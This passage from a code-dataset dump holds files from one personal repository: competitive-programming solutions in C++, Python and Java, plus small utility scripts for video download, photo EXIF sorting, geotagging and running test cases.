\"{3}\"'\n\ndef trimDigits(x):\n return int(re.split('^(\\d+)', x)[1])\n\nif not args.verbose:\n FFMPEG += ' -v fatal -stats'\n FFMPEGAUDIO += ' -v fatal -stats'\n\nif fileExists(args.url):\n download_file_path = args.url\n if args.output != None: download_file_path = args.output\n\n process_call_str = FFMPEG.format(args.url, time, download_file_path)\nelse:\n from pytube import YouTube\n yt = YouTube(args.url)\n download_file_path = '{0}.mp4'.format(yt.title)\n if args.output != None: download_file_path = args.output\n\n videos, audios = {}, {}\n for stream in yt.streams.all():\n if stream.resolution != None:\n videos[trimDigits(stream.resolution)] = stream\n if stream.abr != None:\n audios[trimDigits(stream.abr)] = stream\n video = videos[max(videos)]\n if not video.audio_codec:\n audio = audios[max(audios)]\n process_call_str = FFMPEGAUDIO.format(video.url, time, audio.url, download_file_path)\n else:\n process_call_str = FFMPEG.format(video.url, time, download_file_path)\n\nstatus = subprocess.check_call(process_call_str, shell = 
True)\n\n" }, { "alpha_fraction": 0.5854922533035278, "alphanum_fraction": 0.606217622756958, "avg_line_length": 26.571428298950195, "blob_id": "5c89763ed6b3256d31b4bdfc429396b237d20a1f", "content_id": "28832847be3f71cd40e7d47ac72d6d21bdca5a1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 193, "license_type": "no_license", "max_line_length": 91, "num_lines": 7, "path": "/scripts/setLocation.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\ndir=\"$2\"\n[[ -z \"$dir\" ]] && dir=\".\"\n\nlatlong=$(cat /home/igorjan/documents/geolocations.txt | grep $1 | awk '{$1=\"\"; print $0}')\necho $latlong\nupdateExif.sh $latlong \"$dir\"\n" }, { "alpha_fraction": 0.4010617733001709, "alphanum_fraction": 0.4517374634742737, "avg_line_length": 19.116504669189453, "blob_id": "0f10ac8fcf3f6ee1cc244008fad95c06d660cb80", "content_id": "224ebad4a8f6c03b9a51ef11887d37457205bf7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2072, "license_type": "no_license", "max_line_length": 79, "num_lines": 103, "path": "/2020/back/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ns = input()\nstart, finish = input().split()\n\nstart = list(map(int, start.split('-')))\nfinish = list(map(int, finish.split('-')))\n\na = [2000, 1, 1]\nif s == 'WEEK':\n a = [1999, 12, 27]\nelif s == 'FEBRUARY_THE_29TH':\n a = [1996, 2, 29]\n\ndef addMonth(d, cnt):\n for i in range(cnt):\n month = d[1]\n year = d[0]\n if month == 12:\n month = 1\n year += 1\n else:\n month += 1\n\n d = [year, month, d[2]]\n return d\n\ndays = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndef addYears(d):\n year = d[0] + 4\n if year % 100 == 0 and year % 400 != 0:\n year += 4\n return [year, d[1], d[2]]\n\ndef addDays(d, cnt):\n year, month, day = d\n day += cnt\n now = days[month]\n if month == 2 and (year % 4 == 0 and (year % 100 != 0 
or year % 400 == 0)):\n now += 1\n if day > now:\n day -= now\n month += 1\n if month == 13:\n month = 1\n year += 1\n d = [year, month, day]\n return d\n\ndef nxt(d, what):\n if s == 'WEEK':\n return addDays(d, 7)\n elif s == 'MONTH':\n return addMonth(d, 1)\n elif s == 'QUARTER':\n return addMonth(d, 3)\n elif s == 'YEAR':\n return addMonth(d, 12)\n else:\n return addYears(d)\n\ndef prv(d):\n year, month, days = d\n days -= 1\n if days == 0:\n month -= 1\n days = 28\n if month == 0:\n year -= 1\n q = [year, month, days]\n while True:\n w = addDays(q, 1)\n if w == d:\n return q\n q = w\n\nq = []\nwhile a <= start:\n a = nxt(a, s)\n\nif prv(a) >= finish:\n q.append([start, finish])\nelse:\n q.append([start, prv(a)])\n\n while True:\n b = nxt(a, s)\n if b <= finish:\n q.append([a, prv(b)])\n else:\n break\n a = b\n\n q.append([a, finish])\n\ndef get(x):\n return '0' + str(x) if x < 10 else str(x)\n\ndef frmt(d):\n return '-'.join([str(d[0]), get(d[1]), get(d[2])])\nprint(len(q))\nprint('\\n'.join(map(lambda x: ' '.join(map(frmt, x)), q)))\n" }, { "alpha_fraction": 0.30715811252593994, "alphanum_fraction": 0.31410256028175354, "avg_line_length": 16.554454803466797, "blob_id": "3ccdcc46fd4f6c16a8ad4418edd577c0b19fb84f", "content_id": "d4ac93140d176827b0e4f04a3e8e82433df93110", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2446, "license_type": "no_license", "max_line_length": 86, "num_lines": 101, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.06/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <iostream>\r\n#include <set>\r\n#include <vector>\r\n#define problem \"tree\"\r\n \r\nusing namespace std;\r\n \r\nint main()\r\n{\r\n    ios_base::sync_with_stdio(false);\r\n    freopen(problem\".in\", \"r\", stdin);\r\n    freopen(problem\".out\", \"w\", stdout);\r\n \r\n    int n, root;\r\n    cin >> n;\r\n    vector<vector<int>> g(n);\r\n \r\n    vector<int> 
color(n);\r\n    vector<int> ans(n, 0);\r\n \r\n    for (int v = 0; v < n; v++)\r\n    {\r\n        int u, c;\r\n        cin >> u >> c;\r\n        color[v] = c;\r\n        if (u == 0)\r\n        {\r\n            root = v;\r\n        }\r\n        else\r\n        {\r\n            g[u - 1].push_back(v);\r\n        }\r\n    }\r\n \r\n    vector<int> q(n);\r\n \r\n    int head = 0, tail = 0;\r\n \r\n    q[tail++] = root;\r\n \r\n    while (head != tail)\r\n    {\r\n        int u = q[head++];\r\n \r\n        int m = g[u].size();\r\n \r\n        for (int i = 0; i < m; i++)\r\n        {\r\n            q[tail++] = g[u][i];\r\n        }\r\n    }\r\n \r\n    vector<set<int>*> s(n, NULL);\r\n    for (int i = n - 1; i >=0; i--)\r\n    {\r\n        int u = q[i];\r\n \r\n        int m = g[u].size();\r\n \r\n        for (int j = 0; j < m; j++)\r\n        {\r\n            int v = g[u][j];\r\n \r\n            if (s[u] == NULL || s[u]->size() < s[v]->size())\r\n            {\r\n                s[u] = s[v];\r\n            }\r\n        }\r\n \r\n        for (int j = 0; j < m; j++)\r\n        {\r\n            int v = g[u][j];\r\n \r\n            if (s[u] != s[v])\r\n            {\r\n                for(set<int>::iterator itr = s[v]->begin(); itr != s[v]->end(); ++itr)\r\n                {\r\n                    s[u]->insert(*itr);\r\n                }\r\n            }\r\n        }\r\n \r\n        if (s[u] == NULL)\r\n        {\r\n            s[u] = new set<int>();\r\n        }\r\n \r\n        s[u]->insert(color[u]);\r\n        ans[u] = s[u]->size();\r\n    }\r\n \r\n    for (int i = 0; i < n; i++)\r\n    {\r\n        cout << ans[i] << ' ';\r\n    }\r\n \r\n \r\n    return 0;\r\n}" }, { "alpha_fraction": 0.5078824162483215, "alphanum_fraction": 0.5272688269615173, "avg_line_length": 29.679738998413086, "blob_id": "efb4f339a67ec9bab608996077364c6699b02886", "content_id": "465cdc4e2dc2a4849657bf802a3ef09c9faea611", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 4694, "license_type": "no_license", "max_line_length": 163, "num_lines": 153, "path": "/CodeForce/0995/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//binpow\nll binpow(ll a, ll n, ll p)\n{\n ll res = 1;\n while (n > 0)\n {\n if (n & 1)\n res = (res * a) % p;\n a = (a * a) % p;\n n >>= 1;\n }\n return res;\n}\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nvoid run()\n{\n ints(u, v, p);\n map<int, pii> p1, p2;\n queue<int> q1, q2;\n int found = -1;\n q1.push(u);\n q2.push(v);\n\n auto contains = [&](map<int, pii>& m, int value) { return m.find(value) != m.end(); };\n\n auto push1 = [&](int next, pii prev) {\n if (contains(p1, next))\n return;\n p1[next] = prev;\n q1.push(next);\n };\n\n auto push2 = [&](int next, pii prev) {\n if (contains(p2, next))\n return;\n p2[next] = prev;\n q2.push(next);\n if (contains(p1, next))\n found = next;\n };\n\n auto next = [&](int x) { return (x + 1) % p; };\n auto prev = [&](int x) { return (x + p - 1) % p; };\n auto inverse = [&](int x) { return binpow(x, p - 2, p); };\n\n while (found == -1)\n {\n int x = q1.front();\n int y = q2.front();\n q1.pop();\n q2.pop();\n\n push1(next(x), {x, 1});\n push1(prev(x), {x, 2});\n push1(inverse(x), {x, 3});\n\n push2(next(y), {y, 2});\n push2(prev(y), {y, 1});\n push2(inverse(y), {y, 3});\n }\n\n vi ans;\n int x = found;\n int y = found;\n while (x != u)\n ans.pb(p1[x].second),\n x = p1[x].first;\n reverse(whole(ans));\n while (y != v)\n ans.pb(p2[y].second),\n y = p2[y].first;\n writeln(ans.size());\n writeln(ans);\n return;\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double 
time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5399558544158936, "alphanum_fraction": 0.5567328929901123, "avg_line_length": 28.225807189941406, "blob_id": "2fa728baca19529bcf2c2ffcbffdce7254c4ef56", "content_id": "41b587521090c47d01200a241a2c76f05f28e4cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4530, "license_type": "no_license", "max_line_length": 165, "num_lines": 155, "path": "/CodeForce/0618/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); 
--i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<ll, ll>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\nll sqr(ll x)\n{\n return x * x;\n}\n\nll dist(pll& a, pii& b)\n{\n return sqr(a.first - b.first) + sqr(a.second - b.second);\n}\n\n/*\n ax ay 1\n bx by 1\n cx cy 1\n*/\n\n#define ax a.first\n#define bx b.first\n#define cx c.first\n#define ay a.second\n#define by b.second\n#define cy c.second\nint ori(pii& a, pii& b, pii& c)\n{\n ll q = ax * 1ll * by - ay * 1ll * bx - ax * 1ll * cy + ay * 1ll * cx + bx * 1ll * cy - by * 1ll * cx;\n return q > 0 ? 1 : q < 0 ? 
-1 : 0;\n}\n\nvoid run()\n{\n#define piii pair<pair<ll, ll>, int>\n ints(n);\n vector<piii> a(n);\n fori(n)\n readln(a[i].first),\n a[i].second = i + 1;\n int index = argmin(a);\n auto z = a[index];\n a.erase(a.begin() + index);\n sort(whole(a), [&z](piii& a, piii& b) {\n int q = ori(z.first, a.first, b.first);\n if (q == 0)\n return dist(z.first, a.first) < dist(z.first, b.first);\n return q == 1;\n });\n int i = 1;\n while (ori(z.first, a[0].first, a[i].first) == 0)\n ++i;\n writeln(z.second, a[0].second, a[i].second);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5686988234519958, "alphanum_fraction": 0.5750682353973389, "avg_line_length": 33.34375, "blob_id": "e0cee879bf652b82560b5f4e099badfca25f0419", "content_id": "01e34f177cb07eff3688dfa2f552825cb67b5a56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2198, "license_type": "no_license", "max_line_length": 184, "num_lines": 64, "path": 
"/scripts/splitByPanoramas.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport PIL.Image\nimport PIL.ExifTags\n\nimport sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\n\ndef getDate(x):\n return datetime.datetime.strptime(x, '%Y:%m:%d %H:%M:%S')\n\[email protected]()\[email protected]('directory', required=True, type=click.Path(file_okay=False), nargs=1)\ndef findPanos(directory):\n def getExif(filename):\n try:\n img = PIL.Image.open(os.path.join(directory, filename))\n return dotdict({\n PIL.ExifTags.TAGS[k]: v\n for k, v in img._getexif().items()\n if k in PIL.ExifTags.TAGS\n }, filename = filename)\n except IOError:\n print(filename, 'is not an image')\n return None\n\n panos = []\n cur = []\n exifs = list(filter(lambda x: x, map(lambda filename: getExif(filename), os.listdir(directory))))\n exifs.sort(key = lambda x: getDate(x.DateTime))\n\n def isPortrait(exif):\n return exif.ExifImageWidth < exif.ExifImageHeight or exif.Orientation is not None and exif.Orientation % 2 == 0\n\n for exif in exifs:\n if cur:\n last = cur[-1]\n diff = (getDate(exif.DateTime) - getDate(last.DateTime)).total_seconds()\n # print(last.ExifImageWidth, last.ExifImageHeight, last.Model, last.Orientation)\n if isPortrait(exif) and diff < 60 and diff > 0 and last.Model == exif.Model and last.ExifImageWidth == exif.ExifImageWidth and last.ExifImageHeight == exif.ExifImageHeight:\n cur.append(exif)\n else:\n if len(cur) > 1:\n panos.append(cur)\n if isPortrait(exif):\n cur = [exif]\n else:\n cur = []\n elif isPortrait(exif):\n cur = [exif]\n if len(cur) > 1:\n panos.append(cur)\n for (i, pano) in enumerate(panos):\n # print(i, pano)\n dst = os.path.join(directory, str(i + 1))\n os.mkdir(dst)\n for exif in pano:\n filename = exif.filename\n os.rename(os.path.join(directory, filename), os.path.join(dst, filename))\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.4944852888584137, 
"alphanum_fraction": 0.5173319578170776, "avg_line_length": 31.547008514404297, "blob_id": "65eab1d99bc79dcc37f32185b8cbf21612ce212a", "content_id": "5f17c4460ef33f25ea003bb055cf5ffc967c5a14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3808, "license_type": "no_license", "max_line_length": 174, "num_lines": 117, "path": "/2020/bguirQual/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 100000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nmap<ll, vector<vector<ll>>> cache;\nvoid run()\n{\n ll n;\n readln(n);\n\n vector<ll> degs = {1};\n fori(19)\n degs.pb(degs.back() * 10);\n function<vector<vector<ll>>(ll)> get = [&](const ll& x) {\n if (auto it = cache.find(x); it != cache.end())\n return it->second;\n vector<vector<ll>> ans(10);\n if (x < 100)\n {\n if (x < 10)\n ans[x].pb(x);\n else\n {\n auto temp = abs(x % 10 - x / 10);\n if (!temp) return ans;\n ans[temp].pb(temp);\n ans[temp].pb(x);\n }\n return cache[x] = ans;\n }\n set<ll> values;\n int y = to_string(x).size();\n FOR(i, max(1, y / 2 - 3), min(y, y / 2 + 3))\n {\n ll left = x % degs[i];\n ll right = x / degs[i];\n ll t = abs(left - right);\n if (t)\n values.insert(t);\n }\n for (const ll& t: values)\n {\n auto temp = get(t);\n fori(10) if (ans[i].empty() && !temp[i].empty()) \n {\n ans[i] = temp[i];\n ans[i].push_back(x);\n break;\n }\n }\n return cache[x] = ans;\n };\n\n if (n < 100 && n % 11 == 0)\n return writeln(1, n);\n auto answer = get(n);\n fori(10)\n if (!answer[i].empty())\n {\n reverse(all(answer[i]));\n return writeln(SZ(answer[i]), answer[i]);\n }\n\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n double time = clock();\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * (clock() - time) / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" 
\"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.39726027846336365, "alphanum_fraction": 0.4212328791618347, "avg_line_length": 23.851064682006836, "blob_id": "4e2160b914ff1ef415b47035fa27c0219032fdd8", "content_id": "2ee897b1a6927fd13178b629a8410a618fc277b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1168, "license_type": "no_license", "max_line_length": 67, "num_lines": 47, "path": "/2019/GCJ/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport random\n\ndef randString(n):\n s = ['0'] * (n // 2) + ['1'] * ((n + 1) // 2)\n for i in range(n - 1, 0, -1):\n j = random.randint(0, i)\n s[i], s[j] = s[j], s[i]\n return s\n # return [chr(random.randint(48, 49)) for i in range(n)]\n\ndef main():\n n, b, f = map(int, input().split())\n # sys.stderr.write(str(n) + \" \" + str(b) + \" \" + str(f) + \"\\n\")\n s = [randString(n) for i in range(f)]\n t = [''] * f\n for i in range(f):\n print(''.join(s[i]))\n # sys.stderr.write(''.join(s[i]) + '\\n')\n sys.stdout.flush()\n t[i] = input()\n\n ans = []\n i = 0\n for j in range(n - b):\n while True:\n ok = True\n for k in range(f):\n ok = ok and (s[k][i] == t[k][j])\n i += 1\n if ok:\n break\n ans += [i - 1]\n while i < n:\n i += 1\n ans += [i - 1]\n\n print(' '.join(map(str, ans)))\n # sys.stderr.write(' '.join(map(str, ans)) + '\\n')\n sys.stdout.flush()\n # s = input()\n if input() == \"-1\":\n sys.stderr.write(\"WA\\n\")\n\nrandom.seed(100000007)\nfor t in range(int(input())):\n main()\n" }, { "alpha_fraction": 0.5500778555870056, "alphanum_fraction": 0.587441623210907, "avg_line_length": 25.52857208251953, "blob_id": "1acdf4c89b7461153bda599ec413831a05f94fee", 
"content_id": "9bbaae404a60ca747b86fbd99994be33a672d429", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1927, "license_type": "no_license", "max_line_length": 95, "num_lines": 70, "path": "/study/task7/Train.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.io.File;\r\nimport java.io.IOException;\r\nimport java.util.List;\r\n\r\npublic class Train {\r\n\r\n\tstatic final String path = \"ann\" + File.separator;\r\n\r\n\tstatic void writeln(Object o) {\r\n\t\tSystem.out.println(o);\r\n\t}\r\n\r\n\tpublic static void main(String[] args) throws IOException {\r\n\t\tint n = IOUtils.imageLength;\r\n\r\n\t\tint count = 60000;\r\n\t\tList<Digit> train = IOUtils.readDigitSet(path + \"train\");\r\n\t\tList<Digit> test = IOUtils.readDigitSet(path + \"test\");\r\n\t\ttrain = train.subList(0, count);\r\n\t\tArtificialNeuralNetwork networks[] = new ArtificialNeuralNetwork[n - 2];\r\n\t\tint[][][] cm = new int[n][10][10];\r\n\t\tint begin = 12;\r\n\t\tint index = begin;\r\n\t\tdouble mx = 0;\r\n\t\tdouble cur = System.currentTimeMillis();\r\n\t\twriteln(\"begin\");\r\n\t\tfor (int hidden = begin; hidden < begin + 1; ++hidden) {\r\n\t\t\tnetworks[hidden] = new ArtificialNeuralNetwork(n * n, n * 10, 10);\r\n\r\n\t\t\tint counter = 0;\r\n\t\t\tfor (Digit digit : train) {\r\n\t\t\t\tif (++counter % 2000 == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\twriteln(counter);\r\n\t\t\t\t\t//ArtificialNeuralNetwork.writeln(digit.getSignal());\r\n\t\t\t\t\tLayer.e /= 1.3;///e polls.addVote?owner_id=-29253653&poll_id=161027588&answer_id=525733035\r\n\t\t\t\t}\r\n\t\t\t\tnetworks[hidden].add(digit);\r\n\t\t\t}\r\n\r\n\t\t\tfor (Digit digit : test) {\r\n\t\t\t\t++cm[hidden][digit.label][networks[hidden].getArgMax(digit)];\r\n\t\t\t}\r\n\t\t\tdouble percent = 0;\r\n\t\t\tdouble sum = 0;\r\n\t\t\tfor (int i = 0; i < 10; i++) {\r\n\t\t\t\tfor (int j = 0; j < 10; j++)\r\n\t\t\t\t\tsum += 
cm[hidden][i][j];\r\n\t\t\t\tpercent += cm[hidden][i][i];\r\n\t\t\t}\r\n\t\t\tpercent /= sum;\r\n\t\t\tif (percent > mx) {\r\n\t\t\t\tmx = percent;\r\n\t\t\t\tindex = hidden;\r\n\t\t\t}\r\n\t\t\twriteln(\"percent = \" + (percent * 100) + \"%\");\r\n\t\t}\r\n\t\twriteln(index);\r\n\t\tfor (int i = 0; i < 10; i++) {\r\n\t\t\tfor (int j = 0; j < 10; j++) {\r\n\t\t\t\tSystem.out.printf(\"%4d \", cm[index][i][j]);\r\n\t\t\t}\r\n\t\t\tSystem.out.println();\r\n\t\t}\r\n\t\twriteln(System.currentTimeMillis() - cur);\r\n\t\tIOUtils.writeAnn(networks[index], path + \"output.ann\");\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.36693549156188965, "alphanum_fraction": 0.39717742800712585, "avg_line_length": 16.714284896850586, "blob_id": "17a4be5b70171f79f5cdc0eecaeda011a8c9bb59", "content_id": "7b1c030fa8722b45ca3ebc037ceccd3aebc575ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 496, "license_type": "no_license", "max_line_length": 42, "num_lines": 28, "path": "/scripts/runSolution.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "exe=$1\nchecker=$2\ndir=$3\n\nif [ ! \"$dir\" ]; then\n dir=\".\"\nfi\n\nfor i in $(seq 1 1000)\ndo\n cur=$dir/$i\n if [ ! -f \"$cur\" ]; then \n if [ ! -f \"$dir/0$i\" ]; then \n if [ ! 
